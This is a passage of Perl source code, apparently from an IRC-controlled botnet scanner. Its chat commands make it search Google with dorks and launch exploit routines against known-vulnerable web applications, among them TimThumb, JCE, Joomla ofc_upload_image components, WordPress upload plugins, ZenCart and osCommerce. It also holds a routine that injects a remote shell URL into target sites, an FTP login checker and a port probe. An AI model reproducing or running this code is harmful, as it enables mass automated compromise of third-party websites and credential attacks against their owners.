  523.                                                         &msg("$path","$xmllogo9Dork 4<9=4>15 $dork ");
  524.                                                         &msg("$path","$xmllogo9Bugz 4<9=4>15 $bug ");
  525.                                                         &msg("$path","$xmllogo9Search Engine 4<9=4>15 Loading ");
  526.                                                         &se_start($path,$bug,$simpan,$dork,$engine,6);
  527.                                                 }
  528.                                         }
  529.                                 }
  530.                 if ($msg =~ /^$e107cmd\s+(.*)/) {
  531.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  532.                                                 if (&isFound($thumbid,"GIF89")) {
  533.                                                 my ($bug,$dork) = ("contact.php",$1);
  534.                                                 my $simpan = 'situs.txt';
  535.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning E107 on 4$path ");
  536.                                                         &msg("$path","$e107logo9Dork 4<9=4>15 $dork ");
  537.                                                         &msg("$path","$e107logo9Search Engine 4<9=4>15 Loading ");
  538.                                                         &se_start($path,$bug,$simpan,$dork,$engine,7);
  539.                                                         } else {
  540.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
  541.                                                         }
  542.                                                 }
  543.                                         }
  544.                                 }
  545.                 if ($msg =~ /^$ihcmd\s+(.*)/) {
  546.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  547.                                                 if (&isFound($thumbid,"GIF89")) {
  548.                                                 my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
  549.                                                 my $simpan = 'situs.txt';
  550.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning Is-Human on 4$path ");
  551.                                                         &msg("$path","$ihlogo9Dork 4<9=4>15 $dork ");
  552.                                                         &msg("$path","$ihlogo9Search Engine 4<9=4>15 Loading ");
  553.                                                         &se_start($path,$bug,$simpan,$dork,$engine,8);
  554.                                                         } else {
  555.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
  556.                                                         }
  557.                                                 }
  558.                                         }
  559.                                 }
  560.                 if ($msg =~ /^$oscocmd\s+(.*)/) {
  561.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  562.                                         my $dork = $1;
  563.                                         my $simpan = 'situs.txt';
  564.                                                 if (&isFound($thumbid,"GIF89")) {
  565.                                                         &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning Oscommerce on 4$path ");
  566.                                                         &msg("$path","$oscologo9Dork 4<9=4>15 $dork ");
  567.                                                         &msg("$path","$oscologo9Search Engine 4<9=4>15 Loading ");
  568.                                                         &se_start($path,"apalah",$simpan,$dork,$engine,9);
  569.                                                         } else {
  570.                                                         &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
  571.                                                         }
  572.                                                 }
  573.                                         }
  574.                                 }
  575.                 if ($msg =~ /^$zencmd\s+(.*)/) {
  576.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  577.                                                 my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
  578.                                                 my $simpan = 'situs.txt';
  579.                                                 &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning ZenCart on 4$path ");
  580.                                                 &msg("$path","$zenlogo9Dork 4<9=4>15 $dork ");
  581.                                                 &msg("$path","$zenlogo9Search Engine 4<9=4>15 Loading ");
  582.                                                 &se_start($path,$bug,$simpan,$dork,$engine,10);
  583.                                                 }
  584.                                         }
  585.                                 }
  586.                                 if ($msg =~ /^$rfgcmd\s+(.*)/) {
  587.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  588.                                                 my ($bug,$dork) = ("wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php",$1);
  589.                                                 my $simpan = 'situs.txt';
  590.                                                 &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning RFG on 4$path ");
  591.                                                 &msg("$path","$rfglogo9Dork 4<9=4>15 $dork ");
  592.                                                 &msg("$path","$rfglogo9Search Engine 4<9=4>15 Loading ");
  593.                                                 &se_start($path,$bug,$simpan,$dork,$engine,11);
  594.                                         }
  595.                                         }
  596.                                 }
  597.                                 if ($msg =~ /^$mmfccmd\s+(.*)/) {
  598.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  599.                                                 my ($bug,$dork) = ("wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",$1);
  600.                                                 my $simpan = 'situs.txt';
  601.                                                 &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning MMFC on 4$path ");
  602.                                                 &msg("$path","$mmfclogo9Dork 4<9=4>15 $dork ");
  603.                                                 &msg("$path","$mmfclogo9Search Engine 4<9=4>15 Loading ");
  604.                                                 &se_start($path,$bug,$simpan,$dork,$engine,12);
  605.                                         }
  606.                                         }
  607.                                 }
  608.                                 if ($msg =~ /^$avmcmd\s+(.*)/) {
  609.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  610.                                                 my ($bug,$dork) = ("wp-content/plugins/html5avmanager/lib/uploadify/custom.php",$1);
  611.                                                 my $simpan = 'situs.txt';
  612.                                                 &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning HTML5 AV Manager on 4$path ");
  613.                                                 &msg("$path","$avmlogo9Dork 4<9=4>15 $dork ");
  614.                                                 &msg("$path","$avmlogo9Search Engine 4<9=4>15 Loading ");
  615.                                                 &se_start($path,$bug,$simpan,$dork,$engine,13);
  616.                                         }
  617.                                         }
  618.                                 }
  619.                                 if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
  620.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  621.                                                 my ($bug,$dork) = ($1,$2);
  622.                                                 my $simpan = 'situs.txt';
  623.                                                 &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning SqL on 4$path ");
  624.                                                 &msg("$path","$sqllogo9Dork 4<9=4>15 $dork ");
  625.                                                 &msg("$path","$sqllogo9Bugz 4<9=4>15 $bug ");
  626.                                                 &msg("$path","$sqllogo9Search Engine 4<9=4>15 Loading ... ");
  627.                                                 &se_start($path,$bug,$simpan,$dork,$engine,14);                                        
  628.                                         }
  629.                                         }
  630.                                 }                              
  631.                                
  632.                 if ($msg =~ /^$jcecmd\s+(.*)/) {
  633.                      if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  634.                          my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b",$1);
  635.                          my $simpan = 'situs.txt';
  636.                          &msg("$chanxxx","9,1[4!9]11 Lapor 4<9=4> 9$nick 11Is Scanning JCE On 4$path ");
  637.                          &msg("$path","$jcelogo9,1Dork 4<9=4>11 $dork ");
  638.                          &msg("$path","$jcelogo9Search Engine 4,1<9=4>11,1 Now Loading ... ");
  639.                         &msg("$path","$jcelogo7ATTENTION : 11,1Don't flood the bot.. 11OK!!!");
  640.                          sendraw("MODE $path +m");
  641.                         &se_start($path,$bug,$simpan,$dork,$engine,15);
  642.                  }
  643.              }
  644.          }
  645.                          if ($msg =~ /^$jnewscmd\s+(.*)/) {
  646.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  647.                                                 my ($bug,$dork) = ("/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1);
  648.                                                 my $simpan = $nick;
  649.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning JNews on 4$path ");
  650.                                                 &msg("$path","$jnewslogo9Dork $dork ");
  651.                                                 &msg("$path","$jnewslogo9Search Engine Now Loading ... ");
  652.                                                 &msg("$path","$jnewslogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  653.                                                 sendraw("MODE $path +m");
  654.                                                 &se_start($path,$bug,$simpan,$dork,$engine,16);
  655.                                                 }
  656.                                         }
  657.                                 }      
  658.  
  659.                                 if ($msg =~ /^$jinccmd\s+(.*)/) {
  660.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  661.                                                 my ($bug,$dork) = ("/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php",$1);
  662.                                                 my $simpan = $nick;
  663.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning JINC on 4$path ");
  664.                                                 &msg("$path","$jinclogo9Dork $dork ");
  665.                                                 &msg("$path","$zinclogo9Search Engine Now Loading ... ");
  666.                                                 &msg("$path","$jincologo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  667.                                                 sendraw("MODE $path +m");
  668.                                                 &se_start($path,$bug,$simpan,$dork,$engine,17);
  669.                                                 }
  670.                                         }
  671.                                 }
  672.                                 if ($msg =~ /^$lettercmd\s+(.*)/) {
  673.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  674.                                                 my ($bug,$dork) = ("/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1);
  675.                                                 my $simpan = $nick;
  676.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning letter on 4$path ");
  677.                                                 &msg("$path","$letterlogo9Dork $dork ");
  678.                                                 &msg("$path","$letterlogo9Search Engine Now Loading ... ");
  679.                                                 &msg("$path","$letterlogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  680.                                                 sendraw("MODE $path +m");
  681.                                                 &se_start($path,$bug,$simpan,$dork,$engine,18);
  682.                                                 }
  683.                                         }
  684.                                 }
  685.                                 if ($msg =~ /^$redmistyccmd\s+(.*)/) {
  686.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  687.                                                 my ($bug,$dork) = ("/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php",$1);
  688.                                                 my $simpan = $nick;
  689.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning RedMistyc on 4$path ");
  690.                                                 &msg("$path","$redmistyclogo9Dork $dork ");
  691.                                                 &msg("$path","$redmistyclogo9Search Engine Now Loading ... ");
  692.                                                 &msg("$path","$redmistyclogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  693.                                                 sendraw("MODE $path +m");
  694.                                                 &se_start($path,$bug,$simpan,$dork,$engine,19);
  695.                                                 }
  696.                                         }
  697.                                 }
  698.                                 if ($msg =~ /^$clipbucketcmd\s+(.*)/) {
  699.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  700.                                                 my ($bug,$dork) = ("/admin_area/charts/ofc-library/ofc_upload_image.php",$1);
  701.                                                 my $simpan = $nick;
  702.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning ClipBucket on 4$path ");
  703.                                                 &msg("$path","$clipbucketlogo9Dork $dork ");
  704.                                                 &msg("$path","$clipbucketlogo9Search Engine Now Loading ... ");
  705.                                                 &msg("$path","$clipbucketlogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  706.                                                 sendraw("MODE $path +m");
  707.                                                 &se_start($path,$bug,$simpan,$dork,$engine,20);
  708.                                                 }
  709.                                         }
  710.                             }
  711.                                
  712.                                         if ($msg =~ /^$phpvmscmd\s+(.*)/) {
  713.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  714.                                                 my ($bug,$dork) = ("/core/lib/php-ofc-library/ofc_upload_image.php",$1);
  715.                                                 my $simpan = $nick;
  716.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning PhpVms on 4$path ");
  717.                                                 &msg("$path","$phpvmslogo9Dork $dork ");
  718.                                                 &msg("$path","$phpvmslogo9Search Engine Now Loading ... ");
  719.                                                 &msg("$path","$phpvmslogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  720.                                                 sendraw("MODE $path +m");
  721.                                                 &se_start($path,$bug,$simpan,$dork,$engine,21);
  722.                                                 }
  723.                                         }
  724.                                 }
  725.                                 if ($msg =~ /^$maian15cmd\s+(.*)/) {
  726.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  727.                                                 my ($bug,$dork) = ("/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php",$1);
  728.                                                 my $simpan = $nick;
  729.                                                 &msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning Maian15 on 4$path ");
  730.                                                 &msg("$path","$maian15logo9Dork $dork ");
  731.                                                 &msg("$path","$maian15logo9Search Engine Now Loading ... ");
  732.                                                 &msg("$path","$maian15logo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
  733.                                                 sendraw("MODE $path +m");
  734.                                                 &se_start($path,$bug,$simpan,$dork,$engine,22);
  735.                                                 }
  736.                                         }
  737.                                 }
  738.                                 if ($msg=~ /^$findcmd\s+(.*)/) {
  739.                     if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  740.                         my ($bug,$dork) = ("images/stories/3xp.php",$1);
  741.                                                 my $simpan = 'situs.txt';
  742.                                                 &msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning JCE-Finder on 4$path ");
  743.                         &msg("$path","$jcelogo 9Dork :4 $dork");
  744.                         &msg("$path","$jcelogo 13Search Engine Loading ...");
  745.                                             &msg("$path","$jcelogo7Hacker BoUnCeR  8,1A.K.A ^SQl^KInG^-11Private Underground!!!");
  746.                                                 &msg("$path","$jcelogo 13Flood Protection Activated ...");
  747.                         sendraw("MODE $path +m");                                              
  748.                         &se_start($path,$bug,$simpan,$dork,$engine,23);                    
  749.                                         }                                              
  750.                                         }
  751.                                 }
  752.                                
  753.                                
  754.                                 if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
  755.                                 my $url = $_[0];
  756.                                 my $host = $_[1];
  757.                                 my $user = $_[2];
  758.                                 my $pass = $_[3];
  759.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  760.                                                 my ($host,$user,$pass) = ($1,$2,$3);
  761.                                                         &msg("$path","9,1[4!9]FTP 4<9=4>15 Checking $host | $user:$pass");
  762.                                                 my $success = 1;
  763.                                                 use Net::FTP;
  764.                                                 my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
  765.                                                 $success = 0 if $ftp->login($user,$pass);
  766.                                                 $ftp->quit;
  767.                                                 if ($success == 0) {
  768.                                                         &notice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 9Success ");
  769.                                                         } else {
  770.                                                         &notice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 4Denied ");
  771.  
  772.                                                         }
  773.                                                 }
  774.                                         }
  775.                                 }
  776.                                 if ($msg=~ /^!ip\s+(.*)/ ) {
  777.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  778.                                                 my $ip = $1;
  779.                                                         &msg("$path","9,1[4!9]15IP 4<9=4>15Searching ".$ip." 4Location ...");
  780.                                                 my $website = "http://www.ipligence.com/geolocation";
  781.                                                 my ($useragent,$request,$response,%form);
  782.                                                 undef %form;
  783.                                                 $form{ip} = $ip;
  784.                                                 $useragent = LWP::UserAgent->new;
  785.                                                 $useragent->timeout(5);
  786.                                                 $request = POST $website,\%form;
  787.                                                 $response = $useragent->request($request);
  788.                                                 if ($response->is_success) {
  789.                                                 my $res = $response->content;
  790.                                                         if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
  791.                                                         my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
  792.                                                         &msg("$path","9,1[4!9]15IP 4<9=4>15IP Address : ".$ip." 4[".$ipaddress."]");
  793.                                                         &msg("$path","9,1[4!9]15IP 4<9=4>15City : ".$ip." 4[".$city."]");
  794.                                                         &msg("$path","9,1[4!9]15IP 4<9=4>15Country : ".$ip." 4[".$country."]");
  795.                                                         &msg("$path","9,1[4!9]15IP 4<9=4>15Continent : ".$ip." 4[".$continent."]");
  796.                                                         }
  797.                                                         else {
  798.                                                                 &msg("$path","9,1[4!9]15IP 4<9=4>15 ".$ip." 4not found in database");
  799.                                                         }
  800.                                                 }
  801.                                                 else {
  802.                                                         &msg("$path","9,1[4!9]15IP 4<12=4> 4 Cannot open IP database.");
  803.                                                 }
  804.                                         }
  805.                                         exit;
  806.                                         }
  807.                                 }
  808.                                 if ($msg=~ /^!dns\s+(.*)/){
  809.                                         my $nsku = $1;
  810.                                         my $mydns = inet_ntoa(inet_aton($nsku));
  811.                                         &msg("$path", "9,1[4!9]15DNS 4<9=4>15$nsku 4Resolved to 4 $mydns");
  812.                                 }
  813.                                 if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
  814.                                         my $hostip= "$1";
  815.                                         my $portsc= "$2";
  816.                                         my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
  817.                                         if ($scansock) {
  818.                                                 &msg("$path","9,1[4!9]15PORT 4<9=4>15 $hostip : $portsc 12Successful !");
  819.                                         }
  820.                                         else {
  821.                                                 &msg("$path","9,1[4!9]15PORT 4<9=4>15 $hostip : $portsc 4Failed !");
  822.                                         }
  823.                                 }
  824.                         }
  825.                 }
  826.         for(my $c=0; $c<= $#lines; $c++) {
  827.             $line = $lines[$c];
  828.             $line = $line_temp.$line if ($line_temp);
  829.             $line_temp = '';
  830.             $line =~ s/\r$//;
  831.             unless ($c == $#lines) {
  832.  
  833.                 parse("$line");
  834.             } else {
  835.                 if ($#lines == 0) {
  836.                     parse("$line");
  837.                 } elsif ($lines[$c] =~ /\r$/) {
  838.                     parse("$line");
  839.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  840.                     parse("$line");
  841.                 } else {
  842.                     $line_temp = $line;
  843.                 }
  844.             }
  845.         }
  846.     }
  847. #deleted
  848.  
  849.  
  850.  
  851. ##################################################################################
  852.  
  853. sub lobex() {
  854.         my $dork = $_[0];
  855.         my @targets;
  856.         for (my $st=0; $st<=1000 ; $st+=100){
  857.                 my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st;
  858.                 my $browser = &search_engine_query($engine);
  859.                 while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  860.                         my $target = $1;
  861.                         if ($target !~ /google|forum|stackoverflow|php\.net/) {
  862.                                 my @sort = split(/\.php/,$target);
  863.                                 push (@targets,$sort[0]);
  864.                         }
  865.                 }
  866.         }
  867.         return @targets;
  868. }
  869.  
  870. sub cari() {
  871.         my $chan = $_[0];
  872.         my $dork = $_[1];
  873.         my $count = 0;
  874.         my @kotor = &lobex($dork);
  875.         my @target = &clean(@kotor);
  876.         my $num = scalar(@target); &msg($chan,"$carilogo9 Total 4[15$num4]9 sites");
  877.         if ($num > 0) {
  878.                 foreach my $site(@target) {
  879.                         $count++;
  880.                         if ($count == $num-1) {
  881.                                 &msg("$chan","$carilogo9Finished 15for 9$dork ");
  882.                         }
  883.                         my $test = "http://".$site.".php?src=".$thumbshell;
  884.                         if (my $pid = fork) { waitpid($pid, 0); } else {
  885.                                 if (fork) { exit; } else {
  886.                                         my $coba = &get_content($test);
  887.                                         if ($coba =~ /Unable to open image/) {
  888.                                                 &msg($chan,"$carilogo9 VulN 4-> 15 http://".$site.".php ");
  889.                                         }
  890.                                 } exit;
  891.                         }
  892.                 }
  893.         }
  894. }
  895.  
  896. sub type() {
  897. my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
  898.         if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);}
  899.         elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
  900.         elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
  901.         elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
  902.         elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
  903.         elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
  904.         elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
  905.         elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
  906.         elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
  907.         elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
  908.         elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
  909.         elsif ($type == 12){$type=&mmfc_exploit($chan,$bug,$simpan,$dork,$engine);}
  910.         elsif ($type == 13){$type=&avm_exploit($chan,$bug,$simpan,$dork,$engine);}
  911.         elsif ($type == 14){$type=&sql_exploit($chan,$bug,$simpan,$dork,$engine);}
  912.         elsif ($type == 15){$type=&jce_exploit($chan,$bug,$simpan,$dork,$engine);}
  913.         elsif ($type == 16){$type=&jnews_exploit($chan,$bug,$simpan,$dork,$engine);}
  914.         elsif ($type == 17){$type=&jinc_exploit($chan,$bug,$simpan,$dork,$engine);}
  915.         elsif ($type == 18){$type=&letter_exploit($chan,$bug,$simpan,$dork,$engine);}
  916.         elsif ($type == 19){$type=&redmistyc_exploit($chan,$bug,$simpan,$dork,$engine);}
  917.         elsif ($type == 20){$type=&clipbucket_exploit($chan,$bug,$simpan,$dork,$engine);}
  918.         elsif ($type == 21){$type=&phpvms_exploit($chan,$bug,$simpan,$dork,$engine);}
  919.         elsif ($type == 22){$type=&maian15_exploit($chan,$bug,$simpan,$dork,$engine);}
  920.         elsif ($type == 23){$type=&find_exploit($chan,$bug,$simpan,$dork,$engine);}
  921. }
  922.  
  923. ##################################################################################
  924.  
  925. sub se_start() {
  926. my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
  927.         if ($gps ==1) {
  928.         if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
  929.         if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
  930.         if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
  931.         if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
  932.         if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
  933.         if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
  934.         if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
  935.         if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
  936.         if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
  937.         if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
  938.         if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
  939.         if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
  940.         if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
  941.         if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
  942.         if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
  943.         if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
  944.         if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
  945.         if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
  946.         if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
  947.         if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
  948.         if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
  949.         if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
  950.         if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
  951.         if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
  952.         if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
  953.         if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
  954.         if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
  955.         if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
  956.         if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
  957.         if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
  958.         if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
  959.         if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
  960.         if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
  961.         if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
  962.         if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
  963.         if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
  964.         if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
  965.         if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
  966.         if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
  967.         if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
  968.         }
  969.         if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
